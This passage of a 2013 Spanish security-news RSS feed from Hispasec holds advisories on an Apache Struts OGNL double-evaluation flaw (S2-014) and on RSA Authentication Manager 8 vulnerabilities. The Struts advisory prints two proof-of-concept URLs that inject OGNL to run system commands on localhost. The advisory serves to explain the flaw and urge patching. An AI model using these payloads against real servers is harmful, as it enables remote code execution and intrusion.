&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.securelist.com/en/blog/208195033/Malicious_PACs_and_Bitcoins"&gt;http://www.securelist.com/en/blog/208195033/Malicious_PACs_and_Bitcoins&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Example PAC file&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://findproxyforurl.com/example-pac-file/"&gt;&lt;span lang="EN-GB"&gt;http://findproxyforurl.com/example-pac-file/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Hispasec @unaaldia: BitCoin: pronósticos cumplidos&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://unaaldia.hispasec.com/2011/06/bitcoin-pronosticos-cumplidos.html"&gt;http://unaaldia.hispasec.com/2011/06/bitcoin-pronosticos-cumplidos.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Sergio de los Santos&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:ssantos@hispasec.com"&gt;ssantos@hispasec.com&lt;/a&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Twitter: &lt;a href="http://www.twitter.com/ssantosv"&gt;@ssantosv&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/j34FO3WmG3k" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/j34FO3WmG3k/nuevo-malware-para-robar-bitcoins.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-19Uk5eg3kSQ/Ua3S7uUk3wI/AAAAAAAAClg/NS1pA2GvhZg/s72-c/pac1.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/nuevo-malware-para-robar-bitcoins.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-8186154067450672421</guid><pubDate>Mon, 03 Jun 2013 21:22:00 +0000</pubDate><atom:updated>2013-06-03T23:25:47.043+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Apache</category><category domain="http://www.blogger.com/atom/ns#">Struts</category><title>Actualización de seguridad para Apache Struts</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Una &lt;a href="http://struts.apache.org/release/2.3.x/docs/s2-014.html"&gt;nueva
actualización de seguridad para el proyecto Apache Struts&lt;/a&gt; soluciona &lt;b&gt;dos vulnerabilidades que podrían
aprovecharse para ejecutar código remoto en el servidor. &lt;/b&gt;Ya hubo un intento
de solucionar estos fallos en la versión inmediatamente anterior, aunque no se
llegaron a cubrir todos los posibles vectores de ataque.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-M4Ynr4-G3RI/Tua316DGyqI/AAAAAAAAAF8/nSoEFUZwdqQ/s1600/Apache-Struts.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-M4Ynr4-G3RI/Tua316DGyqI/AAAAAAAAAF8/nSoEFUZwdqQ/s1600/Apache-Struts.png" height="157" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Struts en un entorno de trabajo
de código abierto para el desarrollo de aplicaciones web en Java EE bajo el
patrón MVC (Modelo Vista Controlador). Desarrollado por &lt;st1:personname productid="la Apache Software" w:st="on"&gt;la Apache Software&lt;/st1:personname&gt;
Foundation, en un primer momento formaba parte del proyecto Jakarta,
convirtiéndose en proyecto independiente en 2005. La versión 1 de Struts llegó
al final de su ciclo de vida el pasado abril, siendo la versión 2 la única
soportada desde entonces.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La actualización de seguridad
soluciona dos fallos, con identificadores CVE-2013-2115 y CVE-2013-1966, que
podrían ser aprovechados para ejecutar código arbitrario en el servidor.
Anteriormente se había publicado el boletín S2-013 que solucionaba estas vulnerabilidades,
pero no en todos los vectores de ataque posibles, los cuales han sido publicados
por el investigador Jon Passki, de Coverity.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Struts utiliza el lenguaje OGNL
(Object-Graph Navigation Language), un lenguaje de expresiones de código
abierto para Java. Los lenguajes de expresiones son utilizados para manejar
propiedades de objetos Java de forma más sencilla, como la llamada a métodos,
además de conversión entre elementos HTTP y objetos Java. Estos lenguajes
suelen ser vulnerables a evaluación doble. Cuando se evalúa una expresión OGNL,
su contenido se puede volver a evaluar como otra expresión OGNL independiente.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
En la configuración de Struts se
define como recoger las llamadas a las acciones cuando estas no están definidas
(en general, Struts permite el uso de comodines para capturar las llamadas a
las acciones):&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;lt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;action name&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"*"&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;class&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"tutorial2.example.ExampleSupport"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;gt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="color: #008c00; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;1&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;lt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;result&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;gt;/&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;example&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;/&lt;/span&gt;&lt;span lang="EN-GB" style="color: purple; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;{&lt;/span&gt;&lt;span lang="EN-GB" style="color: #008c00; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;1&lt;/span&gt;&lt;span lang="EN-GB" style="color: purple; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;}&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;jsp&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;lt;/&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;result&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;gt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="color: #008c00; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;2&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;lt;/&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;action&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;gt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Inyectando código OGNL entre los
caracteres ${} (o %{}), y usándolo como nombre de acción, Struts evalúa tanto
el contenedor ${} como su contenido, que puede ser a su vez código OGNL como el
visto anteriormente. Por ejemplo:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://127.0.0.1:8080/struts2-blank/example/$%7B%23context"&gt;http://127.0.0.1:8080/struts2-blank/example/$%7B%23context&lt;/a&gt;['xwork.MethodAccessor.denyMethodExecution']=%21%28%23_memberAccess['allowStaticMethodAccess']=true%29,%28@java.lang.Runtime@getRuntime%28%29%29.exec%28'touch%20aaa'%29.waitFor%28%29%7D.action/&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Nótese que &lt;st1:personname productid="la URL" w:st="on"&gt;la URL&lt;/st1:personname&gt; termina en .action. Este
ejemplo cambia los valores de los campos
xwork.MethodAccessor.denyMethodExecution y allowStaticMethodAccess, que son los
que previenen la ejecución de código remoto.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La raíz del problema radica en
varias llamadas encadenadas a varios métodos de procesamiento, desde
StrutsResultSupport.conditionalParse a TextParseUtil.translateVariables, que a
su vez llama a OgnlTextParser.evaluate, donde se evalúa el código OGNL interno.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Existe un problema similar en los
métodos HttpHeaderResult.execute y DefaultUrlHelper.translateVariable. Por
ejemplo, en una configuración vulnerable&amp;nbsp;
podemos definir que los accesos a la acción HelloWorld incluyan el
parámetro mensaje:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;lt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;s&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;:&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;url &lt;/span&gt;&lt;span lang="EN-GB" style="color: #e34adc; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;id&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"url"&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; action&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"HelloWorld"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;gt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;lt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;s&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;:&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;param name&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"request_locale"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;s&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;:&lt;/span&gt;&lt;span lang="EN-GB" style="color: #e34adc; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;property&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; value&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"message"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;/&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;s&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;:&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;param&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;gt;&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;lt;/&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;s&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;:&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;url&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Al acceder a un servidor con una
petición cuyos parámetros estén especialmente manipulados, se pueden inyectar
código OGNL en la etiqueta param, que será evaluada. Por ejemplo:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://localhost:8080/struts2-blank/example/HelloWorld.action?message=$"&gt;http://localhost:8080/struts2-blank/example/HelloWorld.action?message=$&lt;/a&gt;{%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Este código será usado como un
parámetro en una etiqueta s:url o s:a, que será a su vez evaluado como OGNL y
finalmente ejecutado. Este método es similar al demostrado en el boletín, con
la diferencia de que en este se utiliza includeParam para definir que se hace
con los parámetros de la petición.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Todas las versiones de Struts
anteriores a 2.3.14.2 son vulnerables, por lo que se recomienda la instalación
del parche lo antes posible.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
S2-014&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://struts.apache.org/release/2.3.x/docs/s2-014.html"&gt;http://struts.apache.org/release/2.3.x/docs/s2-014.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Struts 2 Remote Code Execution via OGNL Double
Evaluation&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection"&gt;&lt;span lang="EN-GB"&gt;https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;Francisco López&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:flopez@hispasec.com"&gt;&lt;span lang="EN-GB"&gt;flopez@hispasec.com&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/O5Zxw990Oss" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/O5Zxw990Oss/actualizacion-de-seguridad-para-apache.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-M4Ynr4-G3RI/Tua316DGyqI/AAAAAAAAAF8/nSoEFUZwdqQ/s72-c/Apache-Struts.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/actualizacion-de-seguridad-para-apache.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-370480365050562849</guid><pubDate>Sun, 02 Jun 2013 02:30:00 +0000</pubDate><atom:updated>2013-06-03T04:31:22.602+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">RSA</category><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">RSA Authentication Manager</category><title>Vulnerabilidades en RSA Authentication Manager 8</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Se han reportado dos vulnerabilidades en RSA Authentication Manager que podrían permitir a un atacante obtener información sensible desde la red local. También de forma remota realizar una denegación de servicio y, potencialmente, &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;comprometer el sistema afectado.&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
RSA Authentication Manager es un software de control de acceso para proteger los recursos y datos confidenciales en la empresa y en la nube, sin importar el dispositivo utilizado (desde dispositivos internos de la red empresarial o mediante móviles).&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las vulnerabilidades encontradas en RSA Authentication Manager son las siguientes:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;CVE-2013-1899: una falta de comprobación podría permitir a un atacante remoto provocar una denegación de servicio (corrupción de ficheros), modificar la configuración establecida, e incluso (a usuarios autenticados) ejecutar código arbitrario a través de una petición de conexión a una base de datos cuyo nombre comience por el carácter '-'. Este error se debe a que la aplicación lleva de serie una versión de PostgreSQL vulnerable a este fallo.&lt;br /&gt;&amp;nbsp; &amp;nbsp;&lt;/li&gt;
&lt;li&gt;CVE-2013-0947: un error relacionado con el inicio de sesión podía permitir a un atacante local obtener información confidencial de los archivos de registro (logs) y configuración.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las vulnerabilidades afectan a RSA Authentication Manager 8, quedando exentas las versiones anteriores. &lt;a href="http://archives.neohapsis.com/archives/bugtraq/current/att-0115/ESA-2013-040.txt"&gt;Desde la página oficial &lt;/a&gt;&lt;b&gt;se puede descargar un parche que soluciona ambos fallos de seguridad.&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Más información:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
ESA-2013-040: RSA Authentication Manager 8.0 Multiple Vulnerabilities&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://archives.neohapsis.com/archives/bugtraq/current/att-0115/ESA-2013-040.txt"&gt;http://archives.neohapsis.com/archives/bugtraq/current/att-0115/ESA-2013-040.txt&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
